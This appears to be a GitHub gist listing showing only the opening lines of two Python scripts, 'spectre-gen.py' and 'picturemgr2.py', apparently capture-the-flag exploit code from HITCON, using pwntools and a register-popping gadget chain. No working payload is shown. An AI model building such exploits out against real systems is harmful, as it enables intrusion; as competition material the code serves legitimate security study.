View spectre-gen.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
context.arch = "amd64" | |
register = {"r8":0,"r9":1,"r10":2,"r11":3,"r12":4,"r13":5,"r14":6,"r15":0x7} | |
idx = 0 | |
def epilogue(): | |
# pop r15_r14_r13_r12_r11_r10_r9_r8_rbp_rdi_rsi_ret |
View picturemgr2.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# By Sean @ HITCON | |
import re | |
import socket | |
import sys | |
import string | |
import random |